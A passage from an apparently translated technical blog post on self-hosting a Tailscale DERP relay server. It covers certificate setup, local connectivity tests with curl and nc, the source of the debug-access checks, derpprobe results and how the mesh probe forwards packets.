Inspect the generated certificate</span></span><br><span class="line">$ openssl x509 -<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.crt -noout -text </span><br><span class="line">Certificate:</span><br><span class="line">    Data:</span><br><span class="line">        Version: 3 (0x2)</span><br><span class="line">        ...</span><br><span class="line">        Issuer: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd</span><br><span class="line">        Validity</span><br><span class="line">            Not Before: Nov 12 05:17:34 2023 GMT</span><br><span class="line">            Not After : Oct 19 05:17:34 2123 GMT</span><br><span class="line">        Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd</span><br><span class="line">        ...</span><br><span class="line">        X509v3 extensions:</span><br><span class="line">            X509v3 Subject Alternative Name: </span><br><span class="line">                DNS:kiprey-derp</span><br><span class="line">            ...</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure><h3 id="3-运行-derper-服务">3. 
<strong>Run derper</strong></h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start derper</span></span><br><span class="line"><span class="comment"># derper also listens on HTTP once HTTPS is enabled, so set the HTTP port to -1 to disable it</span></span><br><span class="line">~/go/bin/derper \</span><br><span class="line">    -c ~/.derper.key \</span><br><span class="line">    -a :8888 -http-port -1 \</span><br><span class="line">    -stun-port 8889 \</span><br><span class="line">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span><br><span class="line">    --certmode manual \</span><br><span class="line">    -certdir ~/certdir \</span><br><span class="line">    --verify-clients</span><br></pre></td></tr></table></figure><h3 id="4-测试连通性">4. 
Testing connectivity</h3><p>The HTTPS-based DERP service can be tested as follows:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">unset</span> all_proxy http_proxy https_proxy</span><br><span class="line"><span class="comment"># --insecure skips TLS certificate verification</span></span><br><span class="line"><span class="comment"># --resolve pins DERP_HOST to the local address 127.0.0.1</span></span><br><span class="line">$ curl --insecure --resolve <span class="string">&quot;<span class="variable">$&#123;DERP_HOST&#125;</span>:8888:127.0.0.1&quot;</span> <span class="string">&quot;https://<span class="variable">$&#123;DERP_HOST&#125;</span>:8888&quot;</span></span><br><span class="line">&lt;html&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;DERP&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;</span><br><span class="line">  This is a</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://tailscale.com/&quot;</span>&gt;Tailscale&lt;/a&gt;</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://pkg.go.dev/tailscale.com/derp&quot;</span>&gt;DERP&lt;/a&gt;</span><br><span class="line">  server.</span><br><span class="line">&lt;/p&gt;</span><br><span class="line">&lt;p&gt;Debug info at &lt;a href=<span class="string">&#x27;/debug/&#x27;</span>&gt;/debug/&lt;/a&gt;.&lt;/p&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Test connectivity of the UDP-based STUN service</span></span><br><span class="line">$ nc 127.0.0.1 8889 -v -u</span><br><span class="line">Connection to 127.0.0.1 8889 port [udp/*] succeeded!</span><br></pre></td></tr></table></figure>
<p><strong>Be sure to disable any proxy while testing! Otherwise requests to localhost go through the proxy</strong>, which results in:<br><code>curl: (35) error:0A000126:SSL routines::unexpected eof while reading</code></p><p><img src="/2023/11/tailscale-derp/Untitled%202.png" alt="Untitled"></p><p>Note that the DERP HTTPS service can only be reached through the previously chosen <em>DERP_HOST</em> hostname, because <strong>the DERP service validates each client connection and requires the ServerName sent by the client to match the HostName of the local certificate</strong>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span 
class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"><span class="comment">// --------------------</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> serveTLS &#123;</span><br><span class="line">log.Printf(<span class="string">&quot;derper: serving on %s with TLS&quot;</span>, *addr)</span><br><span class="line"><span class="keyword">var</span> certManager certProvider</span><br><span class="line">certManager, err = certProviderByCertMode(*certMode, *certDir, *hostname)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">log.Fatalf(<span class="string">&quot;derper: can not start cert provider: %v&quot;</span>, err)</span><br><span class="line">&#125;</span><br><span class="line">httpsrv.TLSConfig = certManager.TLSConfig()</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 1. 
When a client connects, the certificate is looked up from the ClientHello info, and the DERP meta cert is then appended to the chain</span></span><br><span class="line">getCert := httpsrv.TLSConfig.GetCertificate</span><br><span class="line">httpsrv.TLSConfig.GetCertificate = <span class="function"><span class="keyword">func</span><span class="params">(hi *tls.ClientHelloInfo)</span></span> (*tls.Certificate, <span class="type">error</span>) &#123;</span><br><span class="line">cert, err := getCert(hi)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br><span class="line">cert.Certificate = <span class="built_in">append</span>(cert.Certificate, s.MetaCert())</span><br><span class="line"><span class="keyword">return</span> cert, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br><span class="line">    ...</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// cmd/derper/cert.go</span></span><br><span class="line"><span class="comment">// ------------------</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(m *manualCertManager)</span></span> getCertificate(hi *tls.ClientHelloInfo) (*tls.Certificate, <span class="type">error</span>) &#123;</span><br><span class="line"><span class="comment">// 2. 
Before returning the certificate, check that the ServerName requested by the client matches the locally configured hostname</span></span><br><span class="line"><span class="keyword">if</span> hi.ServerName != m.hostname &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;cert mismatch with hostname: %q&quot;</span>, hi.ServerName)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Return a shallow copy of the cert so the caller can append to its</span></span><br><span class="line"><span class="comment">// Certificate field.</span></span><br><span class="line">certCopy := <span class="built_in">new</span>(tls.Certificate)</span><br><span class="line">*certCopy = *m.cert</span><br><span class="line">certCopy.Certificate = certCopy.Certificate[:<span class="built_in">len</span>(certCopy.Certificate):<span class="built_in">len</span>(certCopy.Certificate)]</span><br><span class="line"><span class="keyword">return</span> certCopy, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>So when testing with curl, the <code>--resolve</code> option is required so that requests addressed to <code>DERP_HOST</code> resolve to the local address:</p><blockquote><p>curl --insecure <code>--resolve &quot;$&#123;DERP_HOST&#125;:8888:127.0.0.1&quot;</code> &quot;https://$&#123;DERP_HOST&#125;:8888&quot;</p></blockquote><p>Opened directly in a browser, the page is fairly minimal:</p><blockquote><p>Note: to open this HTTPS service in a browser, either bind the hostname to the local address or generate another certificate with <code>DERP_HOST=localhost</code>; the details are omitted here.</p></blockquote><p><img src="/2023/11/tailscale-derp/Untitled%203.png" alt="Untitled"></p><p>Clicking <code>/debug</code> opens a set of debugging pages; following the links further reveals the debug fields that are set throughout the source code. These fields can be used to judge indirectly whether DERP/STUN is working properly.</p><p><img src="/2023/11/tailscale-derp/Untitled%204.png" alt="Untitled"></p><p>This is very useful, because it lets us confirm that <strong>the DERP service and the STUN service can be assigned the same port and still work</strong> (one uses TCP, the other UDP):</p><blockquote><p>After connecting with nc, not_stun is initially 5; after sending three lines of data it becomes 8.</p></blockquote>
<p><img src="/2023/11/tailscale-derp/Untitled%205.png" alt="Untitled"></p><blockquote><p>So the same trick used with ZeroTier (mix-port) can be applied directly to a Tailscale DERP server.</p></blockquote><h3 id="5-DEBUG-防护">5. Protecting the debug endpoints</h3><p>For security reasons we would like to turn off this debug mode in a real deployment. How can that be done?</p><p>In practice there is nothing to do: as <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/tsweb/tsweb.go#L53">tsweb/tsweb.go#L53</a> shows, a debug request is only let through if it meets either of the following conditions:</p><ol><li>The request has no <code>X-Forwarded-For</code> header and comes from a loopback IP, a Tailscale IP, or the IP specified by TS_ALLOW_DEBUG_IP.</li><li>The request uses the GET method and carries a debugkey whose value matches the content of the file specified by TS_DEBUG_KEY_PATH.</li></ol><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AllowDebugAccess reports whether r should be permitted to 
access</span></span><br><span class="line"><span class="comment">// various debug endpoints.</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">AllowDebugAccess</span><span class="params">(r *http.Request)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> allowDebugAccessWithKey(r) &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> r.Header.Get(<span class="string">&quot;X-Forwarded-For&quot;</span>) != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line"><span class="comment">// TODO if/when needed. For now, conservative:</span></span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">ipStr, _, err := net.SplitHostPort(r.RemoteAddr)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">ip, err := netip.ParseAddr(ipStr)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> tsaddr.IsTailscaleIP(ip) || ip.IsLoopback() || ipStr == envknob.String(<span class="string">&quot;TS_ALLOW_DEBUG_IP&quot;</span>) &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> 
<span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">allowDebugAccessWithKey</span><span class="params">(r *http.Request)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> r.Method != <span class="string">&quot;GET&quot;</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">urlKey := r.FormValue(<span class="string">&quot;debugkey&quot;</span>)</span><br><span class="line">keyPath := envknob.String(<span class="string">&quot;TS_DEBUG_KEY_PATH&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> urlKey != <span class="string">&quot;&quot;</span> &amp;&amp; keyPath != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">slurp, err := os.ReadFile(keyPath)</span><br><span class="line"><span class="keyword">if</span> err == <span class="literal">nil</span> &amp;&amp; <span class="type">string</span>(bytes.TrimSpace(slurp)) == urlKey &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>实际测试如下：</p><p><img src="/2023/11/tailscale-derp/Untitled%206.png" alt="Untitled"></p><h3 id="6-编写-DERP-MAP">6. 
<strong>Writing the DERP map</strong></h3><blockquote><p>In this article, to keep the DERP and STUN services distinct, the two are <strong>not assigned the same port for now</strong>.</p></blockquote><blockquote><p>The official map is a good reference for writing a DERP map: <a href="https://login.tailscale.com/derpmap/default">derp-map - tailscale</a></p></blockquote>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;Regions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;233&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">      <span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span> <span class="number">233</span><span class="punctuation">,</span></span><br><span class="line">      <span class="attr">&quot;RegionCode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;useless-region-code&quot;</span><span class="punctuation">,</span></span><br><span class="line">      <span class="attr">&quot;Nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">          <span class="attr">&quot;Name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;test-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span> <span class="number">233</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;HostName&quot;</span><span class="punctuation">:</span> <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;IPv4&quot;</span><span class="punctuation">:</span> <span class="string">&quot;127.0.0.1&quot;</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;IPv6&quot;</span><span class="punctuation">:</span> <span class="string">&quot;::1&quot;</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;DERPPort&quot;</span><span class="punctuation">:</span> <span class="number">8888</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;STUNPort&quot;</span><span class="punctuation">:</span> <span class="number">8889</span><span class="punctuation">,</span></span><br><span class="line">          <span class="attr">&quot;InsecureForTests&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">      <span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<blockquote><p>Note: HostName must be the DERP_HOST chosen earlier, which is passed to the server for validation; InsecureForTests makes the client skip certificate verification.</p></blockquote><p>Save it as derp-map.json and run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ ~/go/bin/derpprobe -derp-map file://<span class="variable">$HOME</span>/derp-map.json -once</span><br><span class="line">2023/11/12 15:01:38 Waiting <span class="keyword">for</span> all probes (may take up to 1m)</span><br><span class="line">2023/11/12 15:01:40 adding DERP TLS probe <span class="keyword">for</span> test-derp ()</span><br><span class="line">2023/11/12 15:01:40 adding DERP UDP probe <span class="keyword">for</span> test-derp (derp/useless-region-code/test-derp/udp6)</span><br><span class="line">2023/11/12 15:01:40 adding DERP UDP probe <span class="keyword">for</span> test-derp (derp/useless-region-code/test-derp/udp)</span><br><span class="line">2023/11/12 15:01:40 adding DERP mesh probe <span class="keyword">for</span> test-derp-&gt;test-derp ()</span><br><span class="line">2023/11/12 15:01:41 probe derp/useless-region-code/test-derp/tls: connecting to <span class="string">&quot;kiprey-derp:443&quot;</span>: dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving</span><br><span class="line">2023/11/12 15:01:47 probe derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF</span><br><span class="line">2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp6: 667.205µs</span><br><span class="line">2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp: 
2.71478ms</span><br><span class="line">2023/11/12 15:01:54 good: derpmap-probe: 5.609009ms</span><br><span class="line">2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF</span><br><span class="line">2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/tls: connecting to <span class="string">&quot;kiprey-derp:443&quot;</span>: dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving</span><br></pre></td></tr></table></figure><p><strong>What derpprobe probes</strong></p><p>First, a brief description of what derpprobe checks. It mainly probes the following three things (implemented in <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go">prober/derp.go</a>):</p><ol><li><em>DERP TLS probe</em>: only checks whether <strong>a TLS connection can be established</strong> with the DERP server under test; no application-layer data is exchanged (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L58">prober/derp.go#L58</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L97">prober/derp.go#L97</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/tls.go#L29">prober/tls.go#L29</a>).</li><li><em>DERP UDP probe</em>: checks whether <strong>the UDP-based STUN service</strong> on the DERP server under test works (probed once each over IPv4 &amp; IPv6, actually sending and receiving data) (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L113">prober/derp.go#L113</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L206">prober/derp.go#L206</a>).</li><li><em>DERP mesh probe</em>: checks whether <strong>data forwarding between the DERP server under test and the other DERP servers in the same Region</strong> works (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L122">prober/derp.go#L122</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L139">prober/derp.go#L139</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L295">prober/derp.go#L295</a>).</li></ol><p>The output above contains errors, of two kinds:</p>
<ol><li><p><strong>TLS connection failure</strong>. Reading the source shows that <em>DERP TLS probe</em> connects to the DERP server in an unorthodox way: its connection logic is completely different from how a regular client connects, it only dials the <strong>HostName field</strong> from the configuration and never uses the <strong>IPv4/IPv6 fields</strong> (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L97">prober/derp.go#L97</a>; the log above shows it dialing <code>kiprey-derp:443</code>), and it also ignores the <strong>InsecureForTests field</strong> that would disable certificate verification. The TLS probe error therefore cannot be fixed in this setup, but it is also harmless.</p></li><li><p><strong>The prober fails to connect to the DERP service</strong>. The DERP service keeps logging errors like the following:</p> <figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">2023</span>/XX/XX XX:XX:XX derp: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">50566</span>: client xxxxx rejected: client nodekey:xxxxx not in set of peers</span><br></pre></td></tr></table></figure><p>Debugging shows that the client key used by the prober is <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L357">randomly generated</a>, so once DERP is started with <code>--verify-clients</code> it rejects the prober's connection. This flag has to be removed from the DERP service while testing. The final result looks like this:</p><p><img src="/2023/11/tailscale-derp/Untitled%207.png" alt="Untitled"></p></li></ol><p>A few key points about using the prober:</p><ol><li><p>In the screenshot above, derpprobe is <strong>run directly from the latest source code</strong> rather than as a binary built with go install. At the time of writing, a bug in derpprobe was being fixed and the fix had not yet been published to go pkg, so the source was run directly.</p></li><li><p>When using the prober, <strong>be sure to clear any proxy settings</strong>; otherwise HTTPS requests that should have succeeded get &quot;hijacked&quot; somewhere unexpected and the prober fails:</p><p><img src="/2023/11/tailscale-derp/Untitled%208.png" alt="Untitled"></p></li></ol><p>That concludes the derpprobe tests; next, the server will be deployed into a real tailscale network for testing.</p><p><strong>How the DERP mesh probe works</strong></p><p>As an aside, the way the DERP mesh probe works is rather interesting. Its goal is to test <strong>data forwarding when different clients connect to the same Region (cluster)</strong>, in particular how messages are forwarded when the clients are connected to <strong>different nodes of the same Region</strong>. The test proceeds as follows:</p><blockquote><p>To avoid confusion: client1 and client2 denote two distinct client nodes outside the DERP service; <strong>s</strong>client1 and <strong>s</strong>client2 denote the two corresponding structs created inside the DERP service to interact with client1 and client2.</p></blockquote>
<ol><li><p>Initially, the prober creates two client structs in the <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L266">derpProbeNodePair function</a>, client1 (connected to derp1) and client2 (connected to derp2), which <strong>connect to different Regions</strong>. The two clients use different key pairs so that they appear as two independent nodes connecting to different DERP servers.</p><p>However, the code only passes in two <strong>different nodes of the same Region</strong>, so how does it end up connecting to <strong>different Regions</strong>? In fact, the prober disguises these DERP nodes as nodes from different Regions (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L364">prober/derp.go#L364</a>; note that the Nodes of each returned DERPRegion contain only the single node passed in, and the identical RegionID does no harm).</p></li><li><p>On the other side, when the remote DERP service receives a client's connection request, it calls the <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L498">registerClient function</a>, which:</p><ol><li><p>Maintains an <strong>sclient</strong> struct locally in the DERP service, holding the state of each client connection and any messages not yet sent.</p><blockquote><p>On the DERP side, one <code>sclient</code> struct pairs with one <code>derphttp.Client</code> on the client side.</p></blockquote></li><li><p>Broadcasts the client's presence (for example whether it is online, its remote IP address, and so on; see the <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L538">broadcastPeerStateChangeLocked function</a>) to the other DERP clients that are watching this DERP service's connection state.</p></li></ol></li><li><p>Next, the prober <strong>has client1 send 8 random bytes to client2</strong> and expects to receive the same data from <strong>client2</strong>. The data should actually flow along <code>client1 → derp1 → derp2 → client2</code>. In detail:</p><ol><li>When the prober has client1 send the data, client1 calls the <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_client.go#L225">derp_client.Send</a> function, which prefixes the data with the frameSendPacket frame type and client2's dstKey as the destination, forming a <strong>frame packet</strong>.</li><li>client1 first sends this frame packet to derp1 (because client1 does not know client2's address).</li><li>After <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L799-L800">receiving the frame packet</a>, derp1 handles it in the handleFrameSendPacket function.<ol><li><p><strong>If client1 and client2 are connected to the same Region</strong> (that is, derp1 and derp2 are one and the same, and are only separated logically here), derp1 already holds the sclient2 struct that corresponds to client2, so derp1 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L1012-L1017">sends a raw packet</a> directly to sclient2.</p><p>The raw packet carries <strong>the key of the original sender</strong> (in practice, the public key held by each node), which effectively stores the sender's ID inside the raw packet.</p><p>On receiving the raw packet, sclient2 produces a frameRecvPacket for client2. client2 can then call the Recv function to obtain data sent to it by other nodes.</p></li><li><p>If client1 and client2 are connected to separate Regions, derp1 does not know client2's address either, so it <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L985">looks up a forwarder handle that knows how to reach client2</a> (here, an sclient struct connected to derp2). Through this forwarder the message is passed from derp1 to derp2, which hands it to sclient2 and finally delivers it to client2.</p><blockquote><p>The forward operation is performed only once, never a second time.</p></blockquote><p>So how does derp1 know that <em>reaching client2 means going through derp2 first</em>? This comes from the client state broadcast mechanism mentioned in <code>2.b</code> above. When a derp service is started, its arguments can name several other mesh nodes in the same Region; the derp service connects to each of these mesh nodes in turn and watches their client connection state in order to maintain its own forwarding (fwd) state.</p><blockquote><p>These details go rather deep, though, and are not worth pursuing further here.</p></blockquote></li></ol></li></ol></li></ol>
<h2 id="五、Tailscale-调试环境搭建">V. Setting up a Tailscale debugging environment</h2><p>To single-step through the relevant logic, <strong>git clone the tailscale repository locally</strong> and debug from there. The copy under <code>~/go/pkg/mod/tailscale.com@v1.50.1</code> cannot be used directly, because that directory is <strong>not writable</strong>.</p><p>The VSCode launch.json I use is shown below. Note that <code>program</code> must point to a directory rather than a specific Go file; otherwise the debugger cannot find the other Go files of a multi-file package, and symbols go missing:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="comment">// 使用 IntelliSense 了解相关属性。 </span></span><br><span class="line">    <span class="comment">// 悬停以查看现有属性的描述。</span></span><br><span class="line">    <span class="comment">// 欲了解更多信息，请访问: https://go.microsoft.com/fwlink/?linkid=830387</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Launch derpprobe&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span 
class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;cmd/derpprobe&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                <span class="string">&quot;-derp-map&quot;</span><span class="punctuation">,</span> <span class="string">&quot;file:///home/kiprey/derp-map.json&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-once&quot;</span></span><br><span class="line">            <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;workspaceFolder&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span 